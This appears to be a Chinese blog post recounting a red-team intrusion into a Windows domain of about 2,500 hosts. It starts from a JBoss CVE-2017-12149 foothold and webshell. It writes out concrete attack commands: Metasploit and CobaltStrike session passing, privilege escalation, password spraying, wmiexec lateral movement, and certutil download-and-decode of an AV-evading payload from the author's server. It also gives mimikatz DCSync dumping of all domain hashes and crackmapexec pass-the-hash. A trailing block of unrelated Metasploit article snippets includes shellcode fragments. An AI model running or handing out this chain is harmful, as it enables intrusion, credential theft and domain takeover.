一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

一颗小胡椒2022-03-29 15:35:48

前言

首先是通过 CVE-2017-12149 拿到了一个口子:

但其实 Jboss 的这个路径可以查看到日志 http://redteam.red:9090/status 发现有日志,已经被上传了 webshell:

后来通过 Bypass 后使用 powershell 上线到 CobaltStrike:

利用 Metasploit 特权提权拿到 SYSTEM SHELL

上线之后通过信息搜集发现有几百个补丁,通过已知漏洞提权无果:

随后吧 CobaltStrike 的 Beacon 互传到了 Metasploit:

CS:
创建监听器windows/foreign/reverse_http
执行监听器 spawn msf
MSF:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http

然后通过 Metasploit 的提权检测模块找到了几个提权 exp :

run post/multi/recon/local_exploit_suggester

然后利用提权 exp :

发现用户没变,但是当前特权变多了:

然后直接 getsystem 提权到 SYSTEM:

最后利用 SYSYEM 身份的把 shell 传到 Cobaltstrike:

当前权限就可以抓到密码了:

内网渗透

虽然已经拿到 SYSTEM 会话身份,但是发现没有域管的进程,结果只能另寻他路!然后用抓到到密码去喷射域内其他主机:

然后横向 wmi 横向移动:

 proxychains python3 wmiexec.py -shell-type cmd administrator:passwd@xx.xx.0.108 -codec gbk

之后发现 10.xx.0.156 有一个域管的进程:tsklist /v

并且发现当前机器还有微软自带杀毒:

随后通过 Golang 做了一下免杀,然后让目标下载我们的 exe,通过 certutil 下载我们的 exe:

然后运行发现有问题:

然后我吧 exe 编码成 txt:

certutil -encode main.exe main.txt

然后目标下载 txt 然后解码再运行:

certutil.exe -urlcache -split -f http://redteam.red:80/download/main.txt
certutil -decode main.txt main.exe

直接上线到 CobaltStrike:

然后先 getsystem 提权到 SYSYEM:

然后窃取域管的进程:

随后查询域控IP:

shell net group "Domain Controllers" /domain
shell ping Controllers Computer (ping 域控机器名即可得到IP)

直接拿到域控:

最后直接 dcsync dump 域内全部 hash:

mimikatz lsadump::dcsync /domain:redteam.red /all /csv > c:\hash.txt

这个时候域内数千多个域用户的 hash 都拿到了,可以进行 pth,此时利用 administrator 的 hash 来对域内机器进行批量执行命令:

proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H xxxxxxxxxxxxxxxxxxxxx -d psnet.com -x "net user"

最后使用 SharpHound.exe 查看下域内信息:

execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all

看了看,内网 5000 多个用户,2500 多台机器都沦陷,没啥难度。

metasploit
本作品采用《CC 协议》,转载必须注明作者和本文链接
metasploit浅析
2023-05-30 09:07:26
# Available formats are :process_image, :dylib, :dylib_sha1 and :exec. # 替换对应位置内容,查询知应为rdata区。然后调用payload_generator中的format_payload得到最终的payload可执行程序。其完整内容如下: "\x31\xdb" + # xor ebx,ebx
在此活动检查流量之后,我们能通过流量检测工具识别会话期间所有已执行的命令。现在让我们在初始阶段启动后检查流量。在 TCP 握手之后,我们观察到成功的通信正在进行。检查的流量显示它在 SSL 握手后立即开始。然而,在这种情况下,我们会留下精心制作或默认证书的痕迹,这些证书也可以进行调查,这可能会导致基础设施或受到 IDS/IPS 签名的攻击。在此示例中,我们将使用Meterpreter 反向 tcp有效负载来测试我们的规避能力。
前言对于一名合格的网络安全从业者来说,Metasploit-framework是必会不可的工具,大大降低了exploit的利用门槛。但在实战中,复杂的网络环境以及防火墙策略都会对Metasploit-framework的使用进行干扰。shell_reverse_tcp直接反弹shell,可以直接通过nc接受。
EXOCET 优于 Metasploit 的“Evasive Payloads”模块,因为 EXOCET 在 GCM 模式(Galois/Counter 模式)下使用 AES-256。Metasploit 的 Evasion Payloads 使用易于检测的 RC4 加密。虽然 RC4 可以更快地解密,但 AES-256 很难确定恶意软件的意图。
本文为内测第一周结束后内网学员的学习笔记,后续本公众号会持续更新其他课程学员学习笔记。对课程感兴趣,请添加文末小助手微信咨询。0x01 MSF安装和升级 最近mac本机和linux服务器上的msf在执行msfupdate命令以后都出现了不同程度的玄学问题,于是卸了重装。
Metasploit 总结
2020-08-24 11:30:35
此功能当前是选择加入的。此模块利用CVE-2020-9496,并利用未经验证的XML-RPC接口中的Java反序列化方法。最新的OFBiz版本修复了此漏洞。PR #13998 从 adfoster-R7 大大提高Metasploit工具的速度RPC调用。PR #13961 从dwelch-R7 增加了一个新RHOST_HTTP_URL的选择,它允许用户设定值RHOSTS,RPORT以及SSL通过指定单个URL。来自wvu-r7的 PR #14002修复了payload中的回归问题,在该回归中,空白坏字符没有被编码掉。PR #13974从dwelch-R7修正了一个错误认证lib/metasploit/framework/login_scanner/winrm造成的故障与没有接受的“基本”身份验证服务器模块。
最后的功能是支持 7.3.3 版本之前和之后的两种解密算法,并且支持 Passphrase 解密(前提是你要知道用户设置的 Passphrase),这次主要学习了一个河豚解密算法的编写。旧版本的加解密算法正是使用了河豚算法,这个算法比较容易恢复明文密码,所以新版本添加了 Passphrase 的 SHA256 数据摘要作为 AES-256-CBC 算法的 Key,增加了解密难度,和 Xshell 的主密码一样。
系统安全第37篇普及Metasploit技术,希望您喜欢
但其实 Jboss 的这个路径可以查看到日志
前言 CobalStrike 与 Metasploit 均是渗透利器,各有所长。前者更适合做稳控平台,后者则更擅长内网各类探测搜集与漏洞利用。 两者更需要灵活的联动,各自相互依托,从而提升渗透的效率。 内置Socks功能 通过Beacon内置的socks功能在VPS上开启代理端口,打通目标内网通道,之后将本地Metasploit直接带入目标内网,进行横向渗透。 当然,也可以把代理设置在其他的
一颗小胡椒
暂无描述